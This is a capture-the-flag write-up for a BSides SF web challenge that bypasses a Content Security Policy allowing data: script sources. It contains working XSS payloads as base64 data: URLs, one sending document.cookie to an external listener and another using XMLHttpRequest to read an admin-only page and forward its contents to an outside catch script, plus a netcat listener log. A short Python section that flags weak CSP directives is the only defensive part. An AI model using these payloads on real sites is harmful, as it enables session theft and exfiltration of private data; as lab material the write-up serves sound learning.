csp1 [web]

csp1

Can you bypass the CSP? Try to read /csp-one-flag as admin, all payloads submitted here will be sent to the admin.

Solve

CSP header:

content-security-policy: script-src 'self' data:; default-src 'self'; connect-src *; report-uri /csp_report

The script-src directive allows data: as a source, so a data: URL in a script tag's src is permitted to run and the allow-list is effectively bypassed.
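A defender-side check for this class of policy, added here as an example and not part of the original writeup: it parses a CSP header, applies the script-src to default-src fallback, and flags source expressions (data:, blob:, wildcards, 'unsafe-inline', bare schemes) that make a script allow-list meaningless. The hardened policy is an assumption of what a fixed header could look like, not one the challenge published.

```python
import re

# CSP from this writeup (constructed copy) and an assumed hardened variant.
WEAK_CSP = ("script-src 'self' data:; default-src 'self'; "
            "connect-src *; report-uri /csp_report")
FIXED_CSP = ("script-src 'self'; object-src 'none'; base-uri 'none'; "
             "default-src 'self'; connect-src 'self'; report-uri /csp_report")

# Source expressions under which attacker-controlled script can execute.
# data:/blob: URLs carry attacker content inline, bare schemes and wildcards
# admit any host, and 'unsafe-inline' / 'unsafe-eval' disable the core checks.
RISKY_SCRIPT_SOURCES = {
    "data:", "blob:", "filesystem:", "*", "http:", "https:",
    "'unsafe-inline'", "'unsafe-eval'",
}


def parse_csp(header):
    """Split a CSP header into {directive-name: [source, ...]}."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.strip().split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def script_sources(policy):
    """script-src falls back to default-src when it is absent."""
    if "script-src" in policy:
        return policy["script-src"]
    return policy.get("default-src", [])


def find_script_weaknesses(header):
    """Return the risky script sources in a CSP header, in policy order."""
    policy = parse_csp(header)
    found = []
    for src in script_sources(policy):
        low = src.lower()
        # Wildcard hosts such as https://*.example.com are also too broad.
        if low in RISKY_SCRIPT_SOURCES or "*" in low:
            found.append(src)
    if "script-src" not in policy and "default-src" not in policy:
        found.append("<no script-src or default-src>")
    return found


if __name__ == "__main__":
    for name, csp in (("weak", WEAK_CSP), ("fixed", FIXED_CSP)):
        print(name, find_script_weaknesses(csp))
```

Nonce and hash sources ('nonce-...', 'sha256-...') pass the check, which is what a policy that needs inline script should use instead of data: or 'unsafe-inline'.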

Working XSS 1:

alert(document.domain):

<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

Working XSS 2:

document.location="http://hawkje.net:4242/?c="+document.cookie:

<script src="data:;base64,ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9oYXdramUubmV0OjQyNDIvP2M9Iitkb2N1bWVudC5jb29raWU="></script>

Incoming request from the admin's browser (headless Chrome) on the listener:

$ nc -nvlp 4242
Listening on [0.0.0.0] (family 0, port 4242)

Connection from 34.83.155.121 37306 received!
GET /?c= HTTP/1.1
Host: xxx.net:4242
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/79.0.3945.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate

So no Cookie header, it seems.

Trying with XMLHttpRequest:

// First request: fetch the flag page from the challenge origin itself,
// which is allowed by 'self' and carries the admin's session.
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://csp-1-5aa1f221.challenges.bsidessf.net/csp-one-flag', true);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.onload = function () {
    // Second request: forward the response body to the listener on port 4242.
    // connect-src * allows any origin here, but the listener is plain HTTP.
    var request = new XMLHttpRequest();
    request.open('GET', 'http://hawkje.net:4242/?' + xhr.responseText, true);
    request.send();
};
xhr.send();

Chrome then blocks the second request as mixed content, since the page is HTTPS and the listener is HTTP:

http://xxx.net:4242/?Ah%20ah%20ah,%20you%20didn%27t%20say%20the%20magic%20word

Flag

New version using HTTPS for both requests:

// Same flow as above, but the forwarding target is now HTTPS as well,
// so the mixed-content block no longer applies.
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://csp-1-5aa1f221.challenges.bsidessf.net/csp-one-flag', true);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.onload = function () {
    var request = new XMLHttpRequest();
    request.open('GET', 'https://hawkje.net/catch.php?c=?' + xhr.responseText, true);
    request.send();
};
xhr.send();

Base64-encode the script and build the payload:

<script src="data:;base64,dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyAgICAKeGhyLm9wZW4oJ0dFVCcsICdodHRwczovL2NzcC0xLTVhYTFmMjIxLmNoYWxsZW5nZXMuYnNpZGVzc2YubmV0L2NzcC1vbmUtZmxhZycsIHRydWUpOwp4aHIuc2V0UmVxdWVzdEhlYWRlcignQ29udGVudC10eXBlJywgJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpOwp4aHIub25sb2FkID0gZnVuY3Rpb24gKCkgewp2YXIgcmVxdWVzdCA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwpyZXF1ZXN0Lm9wZW4oJ0dFVCcsICdodHRwczovL2hhd2tqZS5uZXQvY2F0Y2gucGhwP2M9PycreGhyLnJlc3BvbnNlVGV4dCwgdHJ1ZSk7CnJlcXVlc3Quc2VuZCgpCn07Cnhoci5zZW5kKCk7"></script>

Received:

CTF{Cant_Stop_Pwning}